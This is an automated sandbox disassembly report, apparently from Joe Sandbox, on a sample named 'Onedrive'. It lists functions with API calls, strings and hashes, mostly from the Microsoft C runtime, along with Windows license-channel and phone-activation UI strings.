String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
API String ID: 2724354428-1800103407
Opcode ID: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
Instruction ID: 1553598b7f9b47f8f259635c12e75104a3de8aafbce0b83278f31e3995baa23e
Opcode Fuzzy Hash: 8adce8b2c13583390307289f89d3710f9b076da8aee81252e0d5781860522c7d
Instruction Fuzzy Hash: 0A02E13660EFC6A4EA708B14F4543AAB3A4FB88785F504536DA8D47BA8DF7DD194CB00

Function 00007FF8A031E010 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 296COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF8A031E079
_invoke_watson_if_error.LIBCMTD ref: 00007FF8A031E12F
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A031E1D3

Strings

wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00007FF8A031E631
Microsoft Visual C++ Runtime Library, xrefs: 00007FF8A031E645
Line: , xrefs: 00007FF8A031E354
_CrtDbgReport: String too long or IO Error, xrefs: 00007FF8A031E5F9
File: , xrefs: 00007FF8A031E3AB
Expression: , xrefs: 00007FF8A031E2C4
(*_errno()), xrefs: 00007FF8A031E5C8
..., xrefs: 00007FF8A031E42F
Module: , xrefs: 00007FF8A031E45A
@, xrefs: 00007FF8A031E215
common_message_window, xrefs: 00007FF8A031E11F, 00007FF8A031E5BC, 00007FF8A031E62A
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 00007FF8A031E118, 00007FF8A031E5B0, 00007FF8A031E623
@, xrefs: 00007FF8A031E159
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 00007FF8A031E126

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_CriticalHandleLock::_ModuleReentrantScoped_lockScoped_lock::~__invoke_watson_if_error
String ID: File: $Line: $Module: $(*_errno())$...$@$@$Expression: $Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
API String ID: 2724354428-1800103407
Opcode ID: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
Instruction ID: b9f7b1aed5dee46afa13ebdc76d30e36ac7c2ab6e6d9dbafc6f9d3463c543279
Opcode Fuzzy Hash: 36cc416a54f125e35fa876ca446d39aa3a249108b265d09d6c5bebbafa260ccb
Instruction Fuzzy Hash: 3602D23660EFC6A5EA709B14E4943EAB3A4FB88385F504536D68D47BA8DF7DD184CB00

Function 00007FF8A032BC30 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

Strings

wcscpy_s(progname, progname_size, L"<program name unknown>"), xrefs: 00007FF8A032BD5C
wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3), xrefs: 00007FF8A032BDED
<program name unknown>, xrefs: 00007FF8A032BD27
Runtime Error!Program: , xrefs: 00007FF8A032BCB4
Microsoft Visual C++ Runtime Library, xrefs: 00007FF8A032BE89
wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: "), xrefs: 00007FF8A032BCEB
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message), xrefs: 00007FF8A032BE75
minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp, xrefs: 00007FF8A032BCDD, 00007FF8A032BD4E, 00007FF8A032BDDF, 00007FF8A032BE24, 00007FF8A032BE67
..., xrefs: 00007FF8A032BDBA
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n"), xrefs: 00007FF8A032BE32
__acrt_report_runtime_error, xrefs: 00007FF8A032BCE4, 00007FF8A032BD55, 00007FF8A032BDE6, 00007FF8A032BE2B, 00007FF8A032BE6E

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID:
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $__acrt_report_runtime_error$minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")$wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)$wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
API String ID: 0-4242594854
Opcode ID: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
Instruction ID: af63213aa47e05d04b7e63873ef49fd3356869a24561738e8409e5cf5c45b948
Opcode Fuzzy Hash: bc5a43f3c3d65df8e7de82fba6ef7f3b101c2779c10b4b0d15b9a4aa5b4cf862
Instruction Fuzzy Hash: 5A514C61A1EF47A6EB10DB55E8507BA6360FB887C5F801036E98E4B7A5DF3DE248C740

Function 00007FF8A0305FF0 Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 384COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8A0307C80: __FrameHandler3::StateFromControlPc.LIBVCRUNTIMED ref: 00007FF8A0307C9D
Part of subcall function 00007FF8A0307C80: _GetEstablisherFrame.LIBCMTD ref: 00007FF8A0307CBA
Part of subcall function 00007FF8A0307C80: __GetUnwindTryBlock.LIBCMTD ref: 00007FF8A0307CCF
Part of subcall function 00007FF8A0307C80: __FrameHandler3::SetState.LIBVCRUNTIMED ref: 00007FF8A0307CE9
Part of subcall function 00007FF8A0307C80: __SetUnwindTryBlock.LIBCMTD ref: 00007FF8A0307D02

_SetThrowImageBase.LIBVCRUNTIMED ref: 00007FF8A030612B
std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FF8A0306250

Part of subcall function 00007FF8A031D9E0: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8A031DA2B

Is_bad_exception_allowed.LIBCMTD ref: 00007FF8A03061EE
std::bad_alloc::bad_alloc.LIBCMTD ref: 00007FF8A0306212

Part of subcall function 00007FF8A03072E0: std::exception::exception.LIBCMTD ref: 00007FF8A03072FB

Part of subcall function 00007FF8A0308480: RtlPcToFileHeader.KERNEL32 ref: 00007FF8A030853A
Part of subcall function 00007FF8A0308480: RaiseException.KERNEL32 ref: 00007FF8A03085AC

__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 00007FF8A030632A
weak_ptr.LIBCPMTD ref: 00007FF8A03063D3
__FrameHandler4::TryBlockMap::end.LIBVCRUNTIMED ref: 00007FF8A03063E8
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FF8A030640E
_aligned_msize.LIBCMTD ref: 00007FF8A03064C8

Strings

csm, xrefs: 00007FF8A030625E
csm, xrefs: 00007FF8A030607F
csm, xrefs: 00007FF8A0306143

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Frame$BlockHandler3::$StateUnwind$Affinity::operator!=BaseConcurrency::details::ControlEstablisherExceptionFac_nodeFac_node::_FeatureFileFromHandlerHandler4::HardwareHeaderImageIs_bad_exception_allowedMap::endMap::iterator::operator++PresentProcessorRaiseThrow_aligned_msizestd::_std::bad_alloc::bad_allocstd::exception::exceptionweak_ptr
String ID: csm$csm$csm
API String ID: 4284016723-393685449
Opcode ID: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
Instruction ID: 7612203e7621081a4070c4b8a9414f9c4986a683708351eaf3523ac89b2bd179
Opcode Fuzzy Hash: 5a4ceb812667750a209de0e60ec4dde58dbda67a3fc9bd25ab257cf73fe31e94
Instruction Fuzzy Hash: A212083690FEC6A5EA709F56E4803EA77A4FB89780F504136DA8D47BA9DF2CD544CB00

Function 00007FF6104FCE50 Relevance: 34.6, APIs: 11, Strings: 12, Instructions: 122COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD8EE
Part of subcall function 00007FF6104FD874: _wcsicmp.MSVCRT ref: 00007FF6104FD944

_wcsicmp.MSVCRT ref: 00007FF6104FCEB1
_wcsicmp.MSVCRT ref: 00007FF6104FCED7
_wcsicmp.MSVCRT ref: 00007FF6104FCEFD

Strings

TIMEBASED_TRIAL, xrefs: 00007FF6104FCFD4
TIMEBASED_EVAL, xrefs: 00007FF6104FCFB1
TIMEBASED_PROMO, xrefs: 00007FF6104FCFF7
OEM_COA_NSLP, xrefs: 00007FF6104FCECD
UXDifferentiator, xrefs: 00007FF6104FCE6A
RETAIL, xrefs: 00007FF6104FCF65
OEM_SLP, xrefs: 00007FF6104FCEA7
OEM_DM, xrefs: 00007FF6104FCF8B
TIMEBASED_SUB, xrefs: 00007FF6104FD01A
ENVIRONMENT, xrefs: 00007FF6104FCF19
OEM_COA_SLP, xrefs: 00007FF6104FCEF3
VOLUME_KMS, xrefs: 00007FF6104FCF3F

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: _wcsicmp
String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$UXDifferentiator$VOLUME_KMS
API String ID: 2081463915-2552240010
Opcode ID: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
Instruction ID: cc1cbe3a26efda0806d1cad0689853d003c9780bc5dd6cfc098bf38fb92497e7
Opcode Fuzzy Hash: 7101f06e78257f19d75ce938753b12e85f23ac79d475b219decf489ddf843729
Instruction Fuzzy Hash: 1C514A60A0CE46E6FF109B15A58427D67A6BB45FA8F408039D90EC7799DF3CE42AC305

Function 00007FF6104F6A40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 63COMMON

Download Yara Rule

APIs

StrToID.DUI70 ref: 00007FF6104F6A50
StrToID.DUI70 ref: 00007FF6104F6A74

Strings

CIDEdit7, xrefs: 00007FF6104F6B2A
CIDEdit3, xrefs: 00007FF6104F6A94
CIDEdit8, xrefs: 00007FF6104F6B4E
CIDEdit6, xrefs: 00007FF6104F6B06
CIDEdit4, xrefs: 00007FF6104F6ABB
CIDEdit2, xrefs: 00007FF6104F6A6D
CIDEdit5, xrefs: 00007FF6104F6AE2
CIDEdit1, xrefs: 00007FF6104F6A49

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID:
String ID: CIDEdit1$CIDEdit2$CIDEdit3$CIDEdit4$CIDEdit5$CIDEdit6$CIDEdit7$CIDEdit8
API String ID: 0-3748838404
Opcode ID: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
Instruction ID: 3a4ba81eb2a63ecfa817f1c186124469300a954782b66e32d55487beb827c504
Opcode Fuzzy Hash: 7197c68b65dc28501eec29134728e649a67480efd821c9b5258c505cbb260dff
Instruction Fuzzy Hash: 8A310231D0CD02E6FF10AB14EA901787AA8BF59B29FD8C431D01EC23A8DF3C66998711

Function 00007FF6104F2BB0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 175threadCOMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF6104F2BDE
DuiCreateObject.DUI70 ref: 00007FF6104F2C40
#100.WINDOWS.UI.IMMERSIVE ref: 00007FF6104F2CA2
?Create@DUIXmlParser@DirectUI@@SAJPEAPEAV12@P6APEAVValue@2@PEBGPEAX@Z2P6AX11H2@Z2@Z.DUI70 ref: 00007FF6104F2CCB
?SetXMLFromResource@DUIXmlParser@DirectUI@@QEAAJIPEAUHINSTANCE__@@0@Z.DUI70 ref: 00007FF6104F2CF6
?CreateElement@DUIXmlParser@DirectUI@@QEAAJPEBGPEAVElement@2@1PEAKPEAPEAV32@@Z.DUI70 ref: 00007FF6104F2D30
StrToID.DUI70 ref: 00007FF6104F2D91
?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF6104F2DA3
GetCurrentThreadId.KERNEL32 ref: 00007FF6104F2DFE
QueueUserWorkItem.KERNEL32 ref: 00007FF6104F2E16
?Destroy@DUIXmlParser@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF6104F2E5D

Strings

LocationCombobox, xrefs: 00007FF6104F2D8A
EnterNumber, xrefs: 00007FF6104F2DDA
TouchID, xrefs: 00007FF6104F2C5A
PhoneActivation, xrefs: 00007FF6104F2D1D

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: Direct$Parser@$CreateElement@V12@$#100.Create@CurrentDescendent@Destroy@E__@@0@Element@2@1FindFromItemObjectQueueResource@ThreadUserV32@@Value@2@Work
String ID: EnterNumber$LocationCombobox$PhoneActivation$TouchID
API String ID: 3922143050-3457259764
Opcode ID: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
Instruction ID: 368330c75eb15ee403837de0b8e0b89372d9c438c7740543ee8853cb6058eda7
Opcode Fuzzy Hash: e68c5357bdebdf1565543b18696b6f7c2650a5030905b38387725ce4b364b396
Instruction Fuzzy Hash: 0981E625B09F47E2EF009B6AE99027A77A4EB88FA8F505031CA0EC7765DF6CE4548704

Function 00007FF8A0326E90 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 202COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03270B1
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03270E7

Part of subcall function 00007FF8A03278D0: type_info::_name_internal_method.LIBCMTD ref: 00007FF8A03278F4

Part of subcall function 00007FF8A03272C0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03272E0

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03271B7

Part of subcall function 00007FF8A0327880: __CxxFrameHandler2.LIBCMTD ref: 00007FF8A03278B8

_invoke_watson_if_error.LIBCMTD ref: 00007FF8A0327234
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A032727F

Strings

common_expand_argv_wildcards, xrefs: 00007FF8A0326F2F, 00007FF8A0327224
%ls, xrefs: 00007FF8A0326ED9
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00007FF8A0326EEE, 00007FF8A0326F28, 00007FF8A032721D
result != nullptr, xrefs: 00007FF8A0326ECD, 00007FF8A0326F36
?, xrefs: 00007FF8A0326F99
traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count), xrefs: 00007FF8A032722B
*, xrefs: 00007FF8A0326F94

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$FrameHandler2SchedulerScheduler::___crt_unique_heap_ptr_invoke_watson_if_errortype_info::_name_internal_method
String ID: %ls$*$?$common_expand_argv_wildcards$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp$result != nullptr$traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)
API String ID: 1749167088-976376051
Opcode ID: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
Instruction ID: 8b6975c8df4aa4b869310356279e2820ee591736055af2612084c784c2360c46
Opcode Fuzzy Hash: 138c8daca875b3f42370243403c8f406affa96ab05b92cba4c20d7c4dcf060f6
Instruction Fuzzy Hash: 51B11B7251EF82A5EB60DB15E4803AEB7A4FB98384F504136E68D47BA9DF3CD444CB40

Function 00007FF8A0319460 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 105COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A03193E0: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0319427

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A03194B0

Part of subcall function 00007FF8A03039B0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FF8A03039BE

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0319514
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A031955E
__crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A0319579

Part of subcall function 00007FF8A03085F0: __crt_unique_heap_ptr.LIBCMTD ref: 00007FF8A03085FE

Strings

minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00007FF8A03195E1
create_environment, xrefs: 00007FF8A03195E8
traits::tcscpy_s(variable.get(), required_count, source_it), xrefs: 00007FF8A03195EF
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp, xrefs: 00007FF8A031948E, 00007FF8A031953A
s, xrefs: 00007FF8A0319486

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_$CriticalLock::_ReentrantSchedulerScheduler::_Scoped_lockScoped_lock::~___crt_unique_heap_ptr$__crt_scoped_stack_ptr
String ID: create_environment$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp$s$traits::tcscpy_s(variable.get(), required_count, source_it)
API String ID: 2249381636-3310917920
Opcode ID: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
Instruction ID: 29dda5ec95c30033f6144fa7f5d406170fda8484f91f0f20254697e60dcb3f4b
Opcode Fuzzy Hash: 18ac9dd3f81624684d7964865a5f95cb11a2ae88c221e9388e8694d30366c2d7
Instruction Fuzzy Hash: 6E510D2162EE83A2EA40DF55E4513AAA764FB847C1F900032F6CE47BAADF7DD514CB40

Function 00007FF8A0335ED0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_MallocaComputeSize.LIBCONCRTD ref: 00007FF8A0335FB4
_MallocaComputeSize.LIBCONCRTD ref: 00007FF8A0335FC9
new[].LIBCMTD ref: 00007FF8A0335FE3
_MarkAllocaS.LIBCMTD ref: 00007FF8A0335FF0

Part of subcall function 00007FF8A032A320: MultiByteToWideChar.KERNEL32 ref: 00007FF8A032A36B

Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A0336012
Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FF8A033601F
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0336040
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A03360CE

Part of subcall function 00007FF8A0335E40: _freea_crt.LIBCPMTD ref: 00007FF8A0335E51

GetStringTypeW.KERNEL32 ref: 00007FF8A0336104
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock.LIBCMTD ref: 00007FF8A0336113

Strings

minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00007FF8A0335FD4

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd

Similarity

API ID: Concurrency::details::_$CriticalLock::_ReentrantScoped_lockScoped_lock::~_$ComputeMallocaSchedulerScheduler::_Size$AllocaByteCharMarkMultiStringTypeWide_freea_crtnew[]
String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
API String ID: 3292198129-24854585
Opcode ID: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
Instruction ID: f57394adc6e2c8bfc88f5add7ec3eb40f824c5a0ed80210f81d459acbae4b592
Opcode Fuzzy Hash: 71fa810742a88bba194b3d7f30742c70f253489877922a25d7cad75b65da90a9
Instruction Fuzzy Hash: 0F514F3291EA8296E760DB55E0853AEB7A0EBC4380F504039F68E47BA9DF7DD544CF40

Function 00007FF6104FA698 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 111COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF6104FA70E

Strings

RETAIL, xrefs: 00007FF6104FA7F6
OEM_SLP, xrefs: 00007FF6104FA7AA
OEM_COA_NSLP, xrefs: 00007FF6104FA7CC
ENVIRONMENT, xrefs: 00007FF6104FA7E8
OEM_COA_SLP, xrefs: 00007FF6104FA7BE
TIMEBASED_SUB, xrefs: 00007FF6104FA83C
VOLUME_KMS, xrefs: 00007FF6104FA804
TIMEBASED_EVAL, xrefs: 00007FF6104FA812
OEM_DM, xrefs: 00007FF6104FA7DA
TIMEBASED_TRIAL, xrefs: 00007FF6104FA820
TIMEBASED_PROMO, xrefs: 00007FF6104FA82E

Memory Dump Source

Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true

Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd

Similarity

API ID: _wcsicmp
String ID: ENVIRONMENT$OEM_COA_NSLP$OEM_COA_SLP$OEM_DM$OEM_SLP$RETAIL$TIMEBASED_EVAL$TIMEBASED_PROMO$TIMEBASED_SUB$TIMEBASED_TRIAL$VOLUME_KMS
API String ID: 2081463915-1302943250
Opcode ID: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
Instruction ID: f92517a4e06ae0f88ecc33ed6d5dea2152a72d6e5f1b8ced3adda71e438f3f85
Opcode Fuzzy Hash: fa7f94e61f269ecb3e1ff0f2dd14df86dbe6a502da5c08984cef1d8c0c194d74
Instruction Fuzzy Hash: 3551C8B5A0DF02AAEF00AF05E98016973E8BF48BA8F658539D94DC2364DF3DE465C750

Function 00007FF8A0336360 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

swap_c.LIBCMTD ref: 00007FF8A03366AA
swap_c.LIBCMTD ref: 00007FF8A0336707
swap_c.LIBCMTD ref: 00007FF8A0336764

Strings

width > 0, xrefs: 00007FF8A033646A, 00007FF8A03364D3
comp != nullptr, xrefs: 00007FF8A0336510, 00007FF8A0336579
qsort, xrefs: 00007FF8A0336426, 00007FF8A03364CC, 00007FF8A0336572
%ls, xrefs: 00007FF8A03363D0, 00007FF8A0336476, 00007FF8A033651C
base != nullptr || num == 0, xrefs: 00007FF8A03363C4, 00007FF8A033642D
minkernel\crts\ucrt\src\appcrt\stdlib\qsort.cpp, xrefs: 00007FF8A03363E5, 00007FF8A033641F, 00007FF8A033648B, 00007FF8A03364C5, 00007FF8A0336531, 00007FF8A033656B

Memory Dump Source

Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true

Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
